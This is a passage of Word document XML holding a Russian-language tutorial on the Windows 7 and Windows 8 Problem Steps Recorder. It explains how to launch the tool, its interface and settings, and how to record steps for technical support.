        <w:t xml:space="preserve"> и введя PSR.exe. Пользователь может нажать на кнопку записи и выполнить последовательно весь процесс, который они хотят записать. Эта процедура создаст запись, которая может быть направлена к техническому специалисту и просмотрена в Internet Explorer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="113"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1370550" cy="1234237"/>
            <wp:effectExtent l="19050" t="0" r="1050" b="0"/>
            <wp:docPr id="27832" name="Рисунок 168" descr="Windows 7 Problem Steps Recorder">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Windows 7 Problem Steps Recorder">
                      <a:hlinkClick r:id="rId418"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId419" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1373373" cy="1236779"/>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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PSR имеет и ряд других фич. Если данную ситуацию развернуть на 180 градусов, то мы придем к пониманию, что пользователи иногда испытывают проблемы не только с воспроизведением и корректным описаниям своих действий, но и проблемы с выполнением инструкций технических специалистов. PSR можно также использовать для записи процесса ремонта или фикса проблемы, а затем отправить эту инструкцию пользователю, чтобы они могли ее увидеть и выполнить все шаги самостоятельно.</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Во время тестирования Windows 8, я случайно обнаружил приложение с именем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Я использовал его некоторое время, и оно мне понравилось. Затем, я обнаружил, что, через некоторое время в последних обновлениях Windows 7, оно также стало доступно пользователям и для Windows 7, с именем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. В этой статье,я хотел бы показать Вам, что этот удивительный маленький инструмент может сделать, как использовать его и объяснить, когда он будет вашим лучшим другом.</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Открытие Problem Steps Recorder</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В </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,как его назвали в Windows 8 или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,как назвали его в Windows 7,одно и то же приложение. Почему так ? Все довольно просто,так как существуют всего лишь небольшие различия между двумя операционными системами, в том смысле, что </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> еще более удобный и простой в использовании в Windows 8. Это приложение имеет только один исполняемый файл, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psr.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,который можно найти в </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\Windows\System32</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Чтобы открыть его в Windows 7, просто сделайте поиск по слову </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> поиск и нажмите на результаты, которые говорят </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запись шагов, чтобы воспроизвести проблему</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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1795350" cy="1251243"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27834" name="Рисунок 170" descr="http://kompkimi.ru/wp-content/uploads/2012/06/Steps-Recorder.png">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kompkimi.ru/wp-content/uploads/2012/06/Steps-Recorder.png">
                      <a:hlinkClick r:id="rId420"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId421" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1798358" cy="1253340"/>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В Windows 8, вам необходимо зайти в главное меню, щелкните правой кнопкой мыши или проведите пальцем снизу, выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все приложения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , а затем перейдите к </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows Аксессуары-&gt;Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Вы также можете искать по слову </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажать на соответствующий результат поиска.</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1665750" cy="1799584"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27835" name="Рисунок 171" descr="http://kompkimi.ru/wp-content/uploads/2012/06/Windows-8-Steps-Recorder.pn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kompkimi.ru/wp-content/uploads/2012/06/Windows-8-Steps-Recorder.png">
                      <a:hlinkClick r:id="rId422"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId423" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1667104" cy="1801047"/>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В Windows 7, если вы не видите результатов поиска,в приведенном выше примере, вам нужно идти в Панель Управления </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Поиск и устранение неисправностей</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Там, убедитесь, что проверяются следующие опции : </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Получить наибольшее устранение неполадок в Windows онлайн поиске и службы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> устранения неисправностей </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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1953750" cy="1363366"/>
            <wp:effectExtent l="19050" t="0" r="8400" b="0"/>
            <wp:docPr id="27836" name="Рисунок 172" descr="http://kompkimi.ru/wp-content/uploads/2012/06/Troubleshooting-Service.pn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kompkimi.ru/wp-content/uploads/2012/06/Troubleshooting-Service.png">
                      <a:hlinkClick r:id="rId424"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId425" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1954027" cy="1363559"/>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Этот параметр гарантирует, что будут доступны последний поиск и устранения неисправностей , в том числе </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные элементы интерфейса</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Интерфейс программы является одинаковым в обеих системах Windows 7 и Windows 8. Просто имя – это наиболее заметное различие.</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Ниже вы увидите снимок его интерфейса в Windows 7.</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1952695" cy="817818"/>
            <wp:effectExtent l="19050" t="0" r="9455" b="0"/>
            <wp:docPr id="27837" name="Рисунок 173" descr="http://kompkimi.ru/wp-content/uploads/2012/06/program-interfac-problem-steps-recorder.png">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kompkimi.ru/wp-content/uploads/2012/06/program-interfac-problem-steps-recorder.png">
                      <a:hlinkClick r:id="rId426"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId427" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1960121" cy="820928"/>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spacing w:after="113"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этот скриншот показывает результаты программы в Windows 8.</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1888950" cy="839045"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27838" name="Рисунок 174" descr="http://kompkimi.ru/wp-content/uploads/2012/06/step-recorder-Windows-8.pn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kompkimi.ru/wp-content/uploads/2012/06/step-recorder-Windows-8.png">
                      <a:hlinkClick r:id="rId428"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId429" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1894500" cy="841510"/>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Как вы видите, еще одно маленькое различие заключается в том, что в Windows 7, есть вариант </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить как администратор</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Помощь</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , но этого в Windows 8 не </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">хватает. Это потому, что в Windows 8, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> непосредственно работает от имени администратора.</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Когда вы запустите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Windows 7, вы можете быть предупреждены, что открыты некоторые окна на рабочем столе,с которыми вы работаете как администратор.</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Чтобы убедиться, что запись правильная,вы должны использовать в меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Помощь</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить как администратор</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . В варианте </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Помощь</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> появится маленькое окно, в котором вы можете установить, где ваша запись будет сохранена, если вы хотите включить захват экрана и сколько последних захватов программа должна хранить. Если вы собираетесь записывать длительную процедуру, не стесняйтесь изменить номер с 25 по более высокий.</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1888950" cy="1003060"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27839" name="Рисунок 175" descr="http://kompkimi.ru/wp-content/uploads/2012/06/steps_recorder_settings_option-.pn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kompkimi.ru/wp-content/uploads/2012/06/steps_recorder_settings_option-.png">
                      <a:hlinkClick r:id="rId430"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId431" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1889820" cy="1003522"/>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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Начать Запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для начала записи ваших действий, или нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Остановить Запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,что бы остановить и не позволять вам продолжить запись. Но давайте посмотрим в деталях, как этот инструмент работает.</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как работать с Problem Steps Recorder</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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Начать Запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Теперь утилита записывает все ваши движения мышки. Запуск приложений, которые вы хотите использовать, сделали клики , типа того, что вам нужно, и так далее. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> будет записывать то, что вы запустили, на что вы нажали на кнопку, если вы набрали что-то или нет.</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3141750" cy="481409"/>
            <wp:effectExtent l="19050" t="0" r="1500" b="0"/>
